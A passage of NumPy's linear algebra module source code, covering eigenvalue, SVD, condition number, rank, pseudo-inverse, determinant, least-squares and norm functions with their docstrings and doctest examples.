[ 0.00000000-0.70710678j, 0.00000000+0.70710678j]])
Complex-valued matrix with real e-values (but complex-valued e-vectors);
note that a.conj().T = a, i.e., a is Hermitian.
>>> a = np.array([[1, 1j], [-1j, 1]])
>>> w, v = LA.eig(a)
>>> w; v
array([ 2.00000000e+00+0.j, 5.98651912e-36+0.j]) # i.e., {2, 0}
array([[ 0.00000000+0.70710678j, 0.70710678+0.j ],
[ 0.70710678+0.j , 0.00000000+0.70710678j]])
Be careful about round-off error!
>>> a = np.array([[1 + 1e-9, 0], [0, 1 - 1e-9]])
>>> # Theor. e-values are 1 +/- 1e-9
>>> w, v = LA.eig(a)
>>> w; v
array([ 1., 1.])
array([[ 1., 0.],
[ 0., 1.]])
"""
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
_assertFinite(a)
t, result_t = _commonType(a)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
signature = 'D->DD' if isComplexType(t) else 'd->DD'
w, vt = _umath_linalg.eig(a, signature=signature, extobj=extobj)
if not isComplexType(t) and all(w.imag == 0.0):
w = w.real
vt = vt.real
result_t = _realType(result_t)
else:
result_t = _complexType(result_t)
vt = vt.astype(result_t, copy=False)
return w.astype(result_t, copy=False), wrap(vt)
def eigh(a, UPLO='L'):
"""
Return the eigenvalues and eigenvectors of a Hermitian or symmetric matrix.
Returns two objects, a 1-D array containing the eigenvalues of `a`, and
a 2-D square array or matrix (depending on the input type) of the
corresponding eigenvectors (in columns).
Parameters
----------
a : (..., M, M) array
Hermitian/Symmetric matrices whose eigenvalues and
eigenvectors are to be computed.
UPLO : {'L', 'U'}, optional
Specifies whether the calculation is done with the lower triangular
part of `a` ('L', default) or the upper triangular part ('U').
Irrespective of this value only the real parts of the diagonal will
be considered in the computation to preserve the notion of a Hermitian
matrix. It therefore follows that the imaginary part of the diagonal
will always be treated as zero.
Returns
-------
w : (..., M) ndarray
The eigenvalues in ascending order, each repeated according to
its multiplicity.
v : {(..., M, M) ndarray, (..., M, M) matrix}
The column ``v[:, i]`` is the normalized eigenvector corresponding
to the eigenvalue ``w[i]``. Will return a matrix object if `a` is
a matrix object.
Raises
------
LinAlgError
If the eigenvalue computation does not converge.
See Also
--------
eigvalsh : eigenvalues of symmetric or Hermitian arrays.
eig : eigenvalues and right eigenvectors for non-symmetric arrays.
eigvals : eigenvalues of non-symmetric arrays.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The eigenvalues/eigenvectors are computed using LAPACK routines _syevd,
_heevd
The eigenvalues of real symmetric or complex Hermitian matrices are
always real. [1]_ The array `v` of (column) eigenvectors is unitary
and `a`, `w`, and `v` satisfy the equations
``dot(a, v[:, i]) = w[i] * v[:, i]``.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pg. 222.
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, -2j], [2j, 5]])
>>> a
array([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> w, v = LA.eigh(a)
>>> w; v
array([ 0.17157288, 5.82842712])
array([[-0.92387953+0.j , -0.38268343+0.j ],
[ 0.00000000+0.38268343j, 0.00000000-0.92387953j]])
>>> np.dot(a, v[:, 0]) - w[0] * v[:, 0] # verify 1st e-val/vec pair
array([2.77555756e-17 + 0.j, 0. + 1.38777878e-16j])
>>> np.dot(a, v[:, 1]) - w[1] * v[:, 1] # verify 2nd e-val/vec pair
array([ 0.+0.j, 0.+0.j])
>>> A = np.matrix(a) # what happens if input is a matrix object
>>> A
matrix([[ 1.+0.j, 0.-2.j],
[ 0.+2.j, 5.+0.j]])
>>> w, v = LA.eigh(A)
>>> w; v
array([ 0.17157288, 5.82842712])
matrix([[-0.92387953+0.j , -0.38268343+0.j ],
[ 0.00000000+0.38268343j, 0.00000000-0.92387953j]])
>>> # demonstrate the treatment of the imaginary part of the diagonal
>>> a = np.array([[5+2j, 9-2j], [0+2j, 2-1j]])
>>> a
array([[ 5.+2.j, 9.-2.j],
[ 0.+2.j, 2.-1.j]])
>>> # with UPLO='L' this is numerically equivalent to using LA.eig() with:
>>> b = np.array([[5.+0.j, 0.-2.j], [0.+2.j, 2.-0.j]])
>>> b
array([[ 5.+0.j, 0.-2.j],
[ 0.+2.j, 2.+0.j]])
>>> wa, va = LA.eigh(a)
>>> wb, vb = LA.eig(b)
>>> wa; wb
array([ 1., 6.])
array([ 6.+0.j, 1.+0.j])
>>> va; vb
array([[-0.44721360-0.j , -0.89442719+0.j ],
[ 0.00000000+0.89442719j, 0.00000000-0.4472136j ]])
array([[ 0.89442719+0.j , 0.00000000-0.4472136j],
[ 0.00000000-0.4472136j, 0.89442719+0.j ]])
"""
UPLO = UPLO.upper()
if UPLO not in ('L', 'U'):
raise ValueError("UPLO argument must be 'L' or 'U'")
a, wrap = _makearray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
extobj = get_linalg_error_extobj(
_raise_linalgerror_eigenvalues_nonconvergence)
if UPLO == 'L':
gufunc = _umath_linalg.eigh_lo
else:
gufunc = _umath_linalg.eigh_up
signature = 'D->dD' if isComplexType(t) else 'd->dd'
w, vt = gufunc(a, signature=signature, extobj=extobj)
w = w.astype(_realType(result_t), copy=False)
vt = vt.astype(result_t, copy=False)
return w, wrap(vt)
# Singular value decomposition
def svd(a, full_matrices=1, compute_uv=1):
"""
Singular Value Decomposition.
Factors the matrix `a` as ``u * np.diag(s) * v``, where `u` and `v`
are unitary and `s` is a 1-d array of `a`'s singular values.
Parameters
----------
a : (..., M, N) array_like
A real or complex matrix of shape (`M`, `N`) .
full_matrices : bool, optional
If True (default), `u` and `v` have the shapes (`M`, `M`) and
(`N`, `N`), respectively. Otherwise, the shapes are (`M`, `K`)
and (`K`, `N`), respectively, where `K` = min(`M`, `N`).
compute_uv : bool, optional
Whether or not to compute `u` and `v` in addition to `s`. True
by default.
Returns
-------
u : { (..., M, M), (..., M, K) } array
Unitary matrices. The actual shape depends on the value of
``full_matrices``. Only returned when ``compute_uv`` is True.
s : (..., K) array
The singular values for every matrix, sorted in descending order.
v : { (..., N, N), (..., K, N) } array
Unitary matrices. The actual shape depends on the value of
``full_matrices``. Only returned when ``compute_uv`` is True.
Raises
------
LinAlgError
If SVD computation does not converge.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The decomposition is performed using LAPACK routine _gesdd
The SVD is commonly written as ``a = U S V.H``. The `v` returned
by this function is ``V.H`` and ``u = U``.
If ``U`` is a unitary matrix, it means that it
satisfies ``U.H = inv(U)``.
The rows of `v` are the eigenvectors of ``a.H a``. The columns
of `u` are the eigenvectors of ``a a.H``. For row ``i`` in
`v` and column ``i`` in `u`, the corresponding eigenvalue is
``s[i]**2``.
If `a` is a `matrix` object (as opposed to an `ndarray`), then so
are all the return values.
Examples
--------
>>> a = np.random.randn(9, 6) + 1j*np.random.randn(9, 6)
Reconstruction based on full SVD:
>>> U, s, V = np.linalg.svd(a, full_matrices=True)
>>> U.shape, V.shape, s.shape
((9, 9), (6, 6), (6,))
>>> S = np.zeros((9, 6), dtype=complex)
>>> S[:6, :6] = np.diag(s)
>>> np.allclose(a, np.dot(U, np.dot(S, V)))
True
Reconstruction based on reduced SVD:
>>> U, s, V = np.linalg.svd(a, full_matrices=False)
>>> U.shape, V.shape, s.shape
((9, 6), (6, 6), (6,))
>>> S = np.diag(s)
>>> np.allclose(a, np.dot(U, np.dot(S, V)))
True
"""
a, wrap = _makearray(a)
_assertNoEmpty2d(a)
_assertRankAtLeast2(a)
t, result_t = _commonType(a)
extobj = get_linalg_error_extobj(_raise_linalgerror_svd_nonconvergence)
m = a.shape[-2]
n = a.shape[-1]
if compute_uv:
if full_matrices:
if m < n:
gufunc = _umath_linalg.svd_m_f
else:
gufunc = _umath_linalg.svd_n_f
else:
if m < n:
gufunc = _umath_linalg.svd_m_s
else:
gufunc = _umath_linalg.svd_n_s
signature = 'D->DdD' if isComplexType(t) else 'd->ddd'
u, s, vt = gufunc(a, signature=signature, extobj=extobj)
u = u.astype(result_t, copy=False)
s = s.astype(_realType(result_t), copy=False)
vt = vt.astype(result_t, copy=False)
return wrap(u), s, wrap(vt)
else:
if m < n:
gufunc = _umath_linalg.svd_m
else:
gufunc = _umath_linalg.svd_n
signature = 'D->d' if isComplexType(t) else 'd->d'
s = gufunc(a, signature=signature, extobj=extobj)
s = s.astype(_realType(result_t), copy=False)
return s
def cond(x, p=None):
"""
Compute the condition number of a matrix.
This function is capable of returning the condition number using
one of seven different norms, depending on the value of `p` (see
Parameters below).
Parameters
----------
x : (..., M, N) array_like
The matrix whose condition number is sought.
p : {None, 1, -1, 2, -2, inf, -inf, 'fro'}, optional
Order of the norm:
===== ============================
p norm for matrices
===== ============================
None 2-norm, computed directly using the ``SVD``
'fro' Frobenius norm
inf max(sum(abs(x), axis=1))
-inf min(sum(abs(x), axis=1))
1 max(sum(abs(x), axis=0))
-1 min(sum(abs(x), axis=0))
2 2-norm (largest sing. value)
-2 smallest singular value
===== ============================
inf means the numpy.inf object, and the Frobenius norm is
the root-of-sum-of-squares norm.
Returns
-------
c : {float, inf}
The condition number of the matrix. May be infinite.
See Also
--------
numpy.linalg.norm
Notes
-----
The condition number of `x` is defined as the norm of `x` times the
norm of the inverse of `x` [1]_; the norm can be the usual L2-norm
(root-of-sum-of-squares) or one of a number of other matrix norms.
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, Orlando, FL,
Academic Press, Inc., 1980, pg. 285.
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.array([[1, 0, -1], [0, 1, 0], [1, 0, 1]])
>>> a
array([[ 1, 0, -1],
[ 0, 1, 0],
[ 1, 0, 1]])
>>> LA.cond(a)
1.4142135623730951
>>> LA.cond(a, 'fro')
3.1622776601683795
>>> LA.cond(a, np.inf)
2.0
>>> LA.cond(a, -np.inf)
1.0
>>> LA.cond(a, 1)
2.0
>>> LA.cond(a, -1)
1.0
>>> LA.cond(a, 2)
1.4142135623730951
>>> LA.cond(a, -2)
0.70710678118654746
>>> min(LA.svd(a, compute_uv=0))*min(LA.svd(LA.inv(a), compute_uv=0))
0.70710678118654746
"""
x = asarray(x) # in case we have a matrix
if p is None:
s = svd(x, compute_uv=False)
return s[..., 0]/s[..., -1]
else:
return norm(x, p, axis=(-2, -1)) * norm(inv(x), p, axis=(-2, -1))
def matrix_rank(M, tol=None):
"""
Return matrix rank of array using SVD method
Rank of the array is the number of SVD singular values of the array that are
greater than `tol`.
Parameters
----------
M : {(M,), (..., M, N)} array_like
input vector or stack of matrices
tol : {None, float}, optional
threshold below which SVD values are considered zero. If `tol` is
None, and ``S`` is an array with singular values for `M`, and
``eps`` is the epsilon value for datatype of ``S``, then `tol` is
set to ``S.max() * max(M.shape) * eps``.
Notes
-----
The default threshold to detect rank deficiency is a test on the magnitude
of the singular values of `M`. By default, we identify singular values less
than ``S.max() * max(M.shape) * eps`` as indicating rank deficiency (with
the symbols defined above). This is the algorithm MATLAB uses [1]. It also
appears in *Numerical recipes* in the discussion of SVD solutions for linear
least squares [2].
This default threshold is designed to detect rank deficiency accounting for
the numerical errors of the SVD computation. Imagine that there is a column
in `M` that is an exact (in floating point) linear combination of other
columns in `M`. Computing the SVD on `M` will not produce a singular value
exactly equal to 0 in general: any difference of the smallest SVD value from
0 will be caused by numerical imprecision in the calculation of the SVD.
Our threshold for small SVD values takes this numerical imprecision into
account, and the default threshold will detect such numerical rank
deficiency. The threshold may declare a matrix `M` rank deficient even if
the linear combination of some columns of `M` is not exactly equal to
another column of `M` but only numerically very close to another column of
`M`.
We chose our default threshold because it is in wide use. Other thresholds
are possible. For example, elsewhere in the 2007 edition of *Numerical
recipes* there is an alternative threshold of ``S.max() *
np.finfo(M.dtype).eps / 2. * np.sqrt(m + n + 1.)``. The authors describe
this threshold as being based on "expected roundoff error" (p 71).
The thresholds above deal with floating point roundoff error in the
calculation of the SVD. However, you may have more information about the
sources of error in `M` that would make you consider other tolerance values
to detect *effective* rank deficiency. The most useful measure of the
tolerance depends on the operations you intend to use on your matrix. For
example, if your data come from uncertain measurements with uncertainties
greater than floating point epsilon, choosing a tolerance near that
uncertainty may be preferable. The tolerance may be absolute if the
uncertainties are absolute rather than relative.
References
----------
.. [1] MATLAB reference documention, "Rank"
http://www.mathworks.com/help/techdoc/ref/rank.html
.. [2] W. H. Press, S. A. Teukolsky, W. T. Vetterling and B. P. Flannery,
"Numerical Recipes (3rd edition)", Cambridge University Press, 2007,
page 795.
Examples
--------
>>> from numpy.linalg import matrix_rank
>>> matrix_rank(np.eye(4)) # Full rank matrix
4
>>> I=np.eye(4); I[-1,-1] = 0. # rank deficient matrix
>>> matrix_rank(I)
3
>>> matrix_rank(np.ones((4,))) # 1 dimension - rank 1 unless all 0
1
>>> matrix_rank(np.zeros((4,)))
0
"""
M = asarray(M)
if M.ndim < 2:
return int(not all(M==0))
S = svd(M, compute_uv=False)
if tol is None:
tol = S.max(axis=-1, keepdims=True) * max(M.shape[-2:]) * finfo(S.dtype).eps
return (S > tol).sum(axis=-1)
# Generalized inverse
def pinv(a, rcond=1e-15 ):
"""
Compute the (Moore-Penrose) pseudo-inverse of a matrix.
Calculate the generalized inverse of a matrix using its
singular-value decomposition (SVD) and including all
*large* singular values.
Parameters
----------
a : (M, N) array_like
Matrix to be pseudo-inverted.
rcond : float
Cutoff for small singular values.
Singular values smaller (in modulus) than
`rcond` * largest_singular_value (again, in modulus)
are set to zero.
Returns
-------
B : (N, M) ndarray
The pseudo-inverse of `a`. If `a` is a `matrix` instance, then so
is `B`.
Raises
------
LinAlgError
If the SVD computation does not converge.
Notes
-----
The pseudo-inverse of a matrix A, denoted :math:`A^+`, is
defined as: "the matrix that 'solves' [the least-squares problem]
:math:`Ax = b`," i.e., if :math:`\\bar{x}` is said solution, then
:math:`A^+` is that matrix such that :math:`\\bar{x} = A^+b`.
It can be shown that if :math:`Q_1 \\Sigma Q_2^T = A` is the singular
value decomposition of A, then
:math:`A^+ = Q_2 \\Sigma^+ Q_1^T`, where :math:`Q_{1,2}` are
orthogonal matrices, :math:`\\Sigma` is a diagonal matrix consisting
of A's so-called singular values, (followed, typically, by
zeros), and then :math:`\\Sigma^+` is simply the diagonal matrix
consisting of the reciprocals of A's singular values
(again, followed by zeros). [1]_
References
----------
.. [1] G. Strang, *Linear Algebra and Its Applications*, 2nd Ed., Orlando,
FL, Academic Press, Inc., 1980, pp. 139-142.
Examples
--------
The following example checks that ``a * a+ * a == a`` and
``a+ * a * a+ == a+``:
>>> a = np.random.randn(9, 6)
>>> B = np.linalg.pinv(a)
>>> np.allclose(a, np.dot(a, np.dot(B, a)))
True
>>> np.allclose(B, np.dot(B, np.dot(a, B)))
True
"""
a, wrap = _makearray(a)
if _isEmpty2d(a):
res = empty(a.shape[:-2] + (a.shape[-1], a.shape[-2]), dtype=a.dtype)
return wrap(res)
a = a.conjugate()
u, s, vt = svd(a, 0)
m = u.shape[0]
n = vt.shape[1]
cutoff = rcond*maximum.reduce(s)
for i in range(min(n, m)):
if s[i] > cutoff:
s[i] = 1./s[i]
else:
s[i] = 0.
res = dot(transpose(vt), multiply(s[:, newaxis], transpose(u)))
return wrap(res)
# Determinant
def slogdet(a):
"""
Compute the sign and (natural) logarithm of the determinant of an array.
If an array has a very small or very large determinant, then a call to
`det` may overflow or underflow. This routine is more robust against such
issues, because it computes the logarithm of the determinant rather than
the determinant itself.
Parameters
----------
a : (..., M, M) array_like
Input array, has to be a square 2-D array.
Returns
-------
sign : (...) array_like
A number representing the sign of the determinant. For a real matrix,
this is 1, 0, or -1. For a complex matrix, this is a complex number
with absolute value 1 (i.e., it is on the unit circle), or else 0.
logdet : (...) array_like
The natural log of the absolute value of the determinant.
If the determinant is zero, then `sign` will be 0 and `logdet` will be
-Inf. In all cases, the determinant is equal to ``sign * np.exp(logdet)``.
See Also
--------
det
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
.. versionadded:: 1.6.0
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array ``[[a, b], [c, d]]`` is ``ad - bc``:
>>> a = np.array([[1, 2], [3, 4]])
>>> (sign, logdet) = np.linalg.slogdet(a)
>>> (sign, logdet)
(-1, 0.69314718055994529)
>>> sign * np.exp(logdet)
-2.0
Computing log-determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> sign, logdet = np.linalg.slogdet(a)
>>> (sign, logdet)
(array([-1., -1., -1.]), array([ 0.69314718, 1.09861229, 2.07944154]))
>>> sign * np.exp(logdet)
array([-2., -3., -8.])
This routine succeeds where ordinary `det` does not:
>>> np.linalg.det(np.eye(500) * 0.1)
0.0
>>> np.linalg.slogdet(np.eye(500) * 0.1)
(1, -1151.2925464970228)
"""
a = asarray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
real_t = _realType(result_t)
signature = 'D->Dd' if isComplexType(t) else 'd->dd'
sign, logdet = _umath_linalg.slogdet(a, signature=signature)
if isscalar(sign):
sign = sign.astype(result_t)
else:
sign = sign.astype(result_t, copy=False)
if isscalar(logdet):
logdet = logdet.astype(real_t)
else:
logdet = logdet.astype(real_t, copy=False)
return sign, logdet
def det(a):
"""
Compute the determinant of an array.
Parameters
----------
a : (..., M, M) array_like
Input array to compute determinants for.
Returns
-------
det : (...) array_like
Determinant of `a`.
See Also
--------
slogdet : Another way to representing the determinant, more suitable
for large matrices where underflow/overflow may occur.
Notes
-----
.. versionadded:: 1.8.0
Broadcasting rules apply, see the `numpy.linalg` documentation for
details.
The determinant is computed via LU factorization using the LAPACK
routine z/dgetrf.
Examples
--------
The determinant of a 2-D array [[a, b], [c, d]] is ad - bc:
>>> a = np.array([[1, 2], [3, 4]])
>>> np.linalg.det(a)
-2.0
Computing determinants for a stack of matrices:
>>> a = np.array([ [[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]] ])
>>> a.shape
(3, 2, 2)
>>> np.linalg.det(a)
array([-2., -3., -8.])
"""
a = asarray(a)
_assertRankAtLeast2(a)
_assertNdSquareness(a)
t, result_t = _commonType(a)
signature = 'D->D' if isComplexType(t) else 'd->d'
r = _umath_linalg.det(a, signature=signature)
if isscalar(r):
r = r.astype(result_t)
else:
r = r.astype(result_t, copy=False)
return r
# Linear Least Squares
def lstsq(a, b, rcond="warn"):
"""
Return the least-squares solution to a linear matrix equation.
Solves the equation `a x = b` by computing a vector `x` that
minimizes the Euclidean 2-norm `|| b - a x ||^2`. The equation may
be under-, well-, or over- determined (i.e., the number of
linearly independent rows of `a` can be less than, equal to, or
greater than its number of linearly independent columns). If `a`
is square and of full rank, then `x` (but for round-off error) is
the "exact" solution of the equation.
Parameters
----------
a : (M, N) array_like
"Coefficient" matrix.
b : {(M,), (M, K)} array_like
Ordinate or "dependent variable" values. If `b` is two-dimensional,
the least-squares solution is calculated for each of the `K` columns
of `b`.
rcond : float, optional
Cut-off ratio for small singular values of `a`.
For the purposes of rank determination, singular values are treated
as zero if they are smaller than `rcond` times the largest singular
value of `a`.
.. versionchanged:: 1.14.0
If not set, a FutureWarning is given. The previous default
of ``-1`` will use the machine precision as `rcond` parameter,
the new default will use the machine precision times `max(M, N)`.
To silence the warning and use the new default, use ``rcond=None``,
to keep using the old behavior, use ``rcond=-1``.
Returns
-------
x : {(N,), (N, K)} ndarray
Least-squares solution. If `b` is two-dimensional,
the solutions are in the `K` columns of `x`.
residuals : {(), (1,), (K,)} ndarray
Sums of residuals; squared Euclidean 2-norm for each column in
``b - a*x``.
If the rank of `a` is < N or M <= N, this is an empty array.
If `b` is 1-dimensional, this is a (1,) shape array.
Otherwise the shape is (K,).
rank : int
Rank of matrix `a`.
s : (min(M, N),) ndarray
Singular values of `a`.
Raises
------
LinAlgError
If computation does not converge.
Notes
-----
If `b` is a matrix, then all array results are returned as matrices.
Examples
--------
Fit a line, ``y = mx + c``, through some noisy data-points:
>>> x = np.array([0, 1, 2, 3])
>>> y = np.array([-1, 0.2, 0.9, 2.1])
By examining the coefficients, we see that the line should have a
gradient of roughly 1 and cut the y-axis at, more or less, -1.
We can rewrite the line equation as ``y = Ap``, where ``A = [[x 1]]``
and ``p = [[m], [c]]``. Now use `lstsq` to solve for `p`:
>>> A = np.vstack([x, np.ones(len(x))]).T
>>> A
array([[ 0., 1.],
[ 1., 1.],
[ 2., 1.],
[ 3., 1.]])
>>> m, c = np.linalg.lstsq(A, y)[0]
>>> print(m, c)
1.0 -0.95
Plot the data along with the fitted line:
>>> import matplotlib.pyplot as plt
>>> plt.plot(x, y, 'o', label='Original data', markersize=10)
>>> plt.plot(x, m*x + c, 'r', label='Fitted line')
>>> plt.legend()
>>> plt.show()
"""
import math
a, _ = _makearray(a)
b, wrap = _makearray(b)
is_1d = b.ndim == 1
if is_1d:
b = b[:, newaxis]
_assertRank2(a, b)
_assertNoEmpty2d(a, b) # TODO: relax this constraint
m = a.shape[0]
n = a.shape[1]
n_rhs = b.shape[1]
ldb = max(n, m)
if m != b.shape[0]:
raise LinAlgError('Incompatible dimensions')
t, result_t = _commonType(a, b)
# Determine default rcond value
if rcond == "warn":
# 2017-08-19, 1.14.0
warnings.warn("`rcond` parameter will change to the default of "
"machine precision times ``max(M, N)`` where M and N "
"are the input matrix dimensions.\n"
"To use the future default and silence this warning "
"we advise to pass `rcond=None`, to keep using the old, "
"explicitly pass `rcond=-1`.",
FutureWarning, stacklevel=2)
rcond = -1
if rcond is None:
rcond = finfo(t).eps * ldb
result_real_t = _realType(result_t)
real_t = _linalgRealType(t)
bstar = zeros((ldb, n_rhs), t)
bstar[:b.shape[0], :n_rhs] = b.copy()
a, bstar = _fastCopyAndTranspose(t, a, bstar)
a, bstar = _to_native_byte_order(a, bstar)
s = zeros((min(m, n),), real_t)
# This line:
# * is incorrect, according to the LAPACK documentation
# * raises a ValueError if min(m,n) == 0
# * should not be calculated here anyway, as LAPACK should calculate
# `liwork` for us. But that only works if our version of lapack does
# not have this bug:
# http://icl.cs.utk.edu/lapack-forum/archives/lapack/msg00899.html
# Lapack_lite does have that bug...
nlvl = max( 0, int( math.log( float(min(m, n))/2. ) ) + 1 )
iwork = zeros((3*min(m, n)*nlvl+11*min(m, n),), fortran_int)
if isComplexType(t):
lapack_routine = lapack_lite.zgelsd
lwork = 1
rwork = zeros((lwork,), real_t)
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, -1, rwork, iwork, 0)
lwork = int(abs(work[0]))
rwork = zeros((lwork,), real_t)
a_real = zeros((m, n), real_t)
bstar_real = zeros((ldb, n_rhs,), real_t)
results = lapack_lite.dgelsd(m, n, n_rhs, a_real, m,
bstar_real, ldb, s, rcond,
0, rwork, -1, iwork, 0)
lrwork = int(rwork[0])
work = zeros((lwork,), t)
rwork = zeros((lrwork,), real_t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, lwork, rwork, iwork, 0)
else:
lapack_routine = lapack_lite.dgelsd
lwork = 1
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, -1, iwork, 0)
lwork = int(work[0])
work = zeros((lwork,), t)
results = lapack_routine(m, n, n_rhs, a, m, bstar, ldb, s, rcond,
0, work, lwork, iwork, 0)
if results['info'] > 0:
raise LinAlgError('SVD did not converge in Linear Least Squares')
resids = array([], result_real_t)
if is_1d:
x = array(ravel(bstar)[:n], dtype=result_t, copy=True)
if results['rank'] == n and m > n:
if isComplexType(t):
resids = array([sum(abs(ravel(bstar)[n:])**2)],
dtype=result_real_t)
else:
resids = array([sum((ravel(bstar)[n:])**2)],
dtype=result_real_t)
else:
x = array(transpose(bstar)[:n,:], dtype=result_t, copy=True)
if results['rank'] == n and m > n:
if isComplexType(t):
resids = sum(abs(transpose(bstar)[n:,:])**2, axis=0).astype(
result_real_t, copy=False)
else:
resids = sum((transpose(bstar)[n:,:])**2, axis=0).astype(
result_real_t, copy=False)
st = s[:min(n, m)].astype(result_real_t, copy=True)
return wrap(x), wrap(resids), results['rank'], st
def _multi_svd_norm(x, row_axis, col_axis, op):
"""Compute a function of the singular values of the 2-D matrices in `x`.
This is a private utility function used by numpy.linalg.norm().
Parameters
----------
x : ndarray
row_axis, col_axis : int
The axes of `x` that hold the 2-D matrices.
op : callable
This should be either numpy.amin or numpy.amax or numpy.sum.
Returns
-------
result : float or ndarray
If `x` is 2-D, the return values is a float.
Otherwise, it is an array with ``x.ndim - 2`` dimensions.
The return values are either the minimum or maximum or sum of the
singular values of the matrices, depending on whether `op`
is `numpy.amin` or `numpy.amax` or `numpy.sum`.
"""
y = moveaxis(x, (row_axis, col_axis), (-2, -1))
result = op(svd(y, compute_uv=0), axis=-1)
return result
def norm(x, ord=None, axis=None, keepdims=False):
"""
Matrix or vector norm.
This function is able to return one of eight different matrix norms,
or one of an infinite number of vector norms (described below), depending
on the value of the ``ord`` parameter.
Parameters
----------
x : array_like
Input array. If `axis` is None, `x` must be 1-D or 2-D.
ord : {non-zero int, inf, -inf, 'fro', 'nuc'}, optional
Order of the norm (see table under ``Notes``). inf means numpy's
`inf` object.
axis : {int, 2-tuple of ints, None}, optional
If `axis` is an integer, it specifies the axis of `x` along which to
compute the vector norms. If `axis` is a 2-tuple, it specifies the
axes that hold 2-D matrices, and the matrix norms of these matrices
are computed. If `axis` is None then either a vector norm (when `x`
is 1-D) or a matrix norm (when `x` is 2-D) is returned.
keepdims : bool, optional
If this is set to True, the axes which are normed over are left in the
result as dimensions with size one. With this option the result will
broadcast correctly against the original `x`.
.. versionadded:: 1.10.0
Returns
-------
n : float or ndarray
Norm of the matrix or vector(s).
Notes
-----
For values of ``ord <= 0``, the result is, strictly speaking, not a
mathematical 'norm', but it may still be useful for various numerical
purposes.
The following norms can be calculated:
===== ============================ ==========================
ord norm for matrices norm for vectors
===== ============================ ==========================
None Frobenius norm 2-norm
'fro' Frobenius norm --
'nuc' nuclear norm --
inf max(sum(abs(x), axis=1)) max(abs(x))
-inf min(sum(abs(x), axis=1)) min(abs(x))
0 -- sum(x != 0)
1 max(sum(abs(x), axis=0)) as below
-1 min(sum(abs(x), axis=0)) as below
2 2-norm (largest sing. value) as below
-2 smallest singular value as below
other -- sum(abs(x)**ord)**(1./ord)
===== ============================ ==========================
The Frobenius norm is given by [1]_:
:math:`||A||_F = [\\sum_{i,j} abs(a_{i,j})^2]^{1/2}`
The nuclear norm is the sum of the singular values.
References
----------
.. [1] G. H. Golub and C. F. Van Loan, *Matrix Computations*,
Baltimore, MD, Johns Hopkins University Press, 1985, pg. 15
Examples
--------
>>> from numpy import linalg as LA
>>> a = np.arange(9) - 4
>>> a
array([-4, -3, -2, -1, 0, 1, 2, 3, 4])
>>> b = a.reshape((3, 3))
>>> b
array([[-4, -3, -2],
[-1, 0, 1],
[ 2, 3, 4]])
>>> LA.norm(a)
7.745966692414834
>>> LA.norm(b)
7.745966692414834
>>> LA.norm(b, 'fro')
7.745966692414834
>>> LA.norm(a, np.inf)
4.0
>>> LA.norm(b, np.inf)
9.0
>>> LA.norm(a, -np.inf)
0.0
>>> LA.norm(b, -np.inf)
2.0
>>> LA.norm(a, 1)
20.0
>>> LA.norm(b, 1)
7.0
>>> LA.norm(a, -1)
-4.6566128774142013e-010
>>> LA.norm(b, -1)
6.0
>>> LA.norm(a, 2)
7.745966692414834
>>> LA.norm(b, 2)
7.3484692283495345
>>> LA.norm(a, -2)
nan
>>> LA.norm(b, -2)
1.8570331885190563e-016
>>> LA.norm(a, 3)
5.8480354764257312
>>> LA.norm(a, -3)
nan
Using the `axis` argument to compute vector norms:
>>> c = np.array([[ 1, 2, 3],
... [-1, 1, 4]])
>>> LA.norm(c, axis=0)
array([ 1.41421356, 2.23606798, 5. ])
>>> LA.norm(c, axis=1)
array([ 3.74165739, 4.24264069])
>>> LA.norm(c, ord=1, axis=1)
array([ 6., 6.])
Using the `axis` argument to compute matrix norms:
>>> m = np.arange(8).reshape(2,2,2)
>>> LA.norm(m, axis=(1,2))
array([ 3.74165739, 11.22497216])
>>> LA.norm(m[0, :, :]), LA.norm(m[1, :, :])
(3.7416573867739413, 11.224972160321824)
"""
x = asarray(x)
if not issubclass(x.dtype.type, (inexact, object_)):
x = x.astype(float)
# Immediately handle some default, simple, fast, and common cases.
if axis is None:
ndim = x.ndim
if ((ord is None) or
(ord in ('f', 'fro') and ndim == 2) or
(ord == 2 and ndim == 1)):
x = x.ravel(order='K')
if isComplexType(x.dtype.type):
sqnorm = dot(x.real, x.real) + dot(x.imag, x.imag)
else:
sqnorm = dot(x, x)
ret = sqrt(sqnorm)
if keepdims:
ret = ret.reshape(ndim*[1])
return ret
# Normalize the `axis` argument to a tuple.
nd = x.ndim
if axis is None:
axis = tuple(range(nd))
elif not isinstance(axis, tuple):
try:
axis = int(axis)
except Exception:
raise TypeError("'axis' must be None, an integer or a tuple of integers")
axis = (axis,)
if len(axis) == 1:
if ord == Inf:
return abs(x).max(axis=axis, keepdims=keepdims)
elif ord == -Inf:
return abs(x).min(axis=axis, keepdims=keepdims)
elif ord == 0:
# Zero norm
return (x != 0).astype(float).sum(axis=axis, keepdims=keepdims)
elif ord == 1:
# special case for speedup
return add.reduce(abs(x), axis=axis, keepdims=keepdims)
elif ord is None or ord == 2:
# special case for speedup
s = (x.conj() * x).real
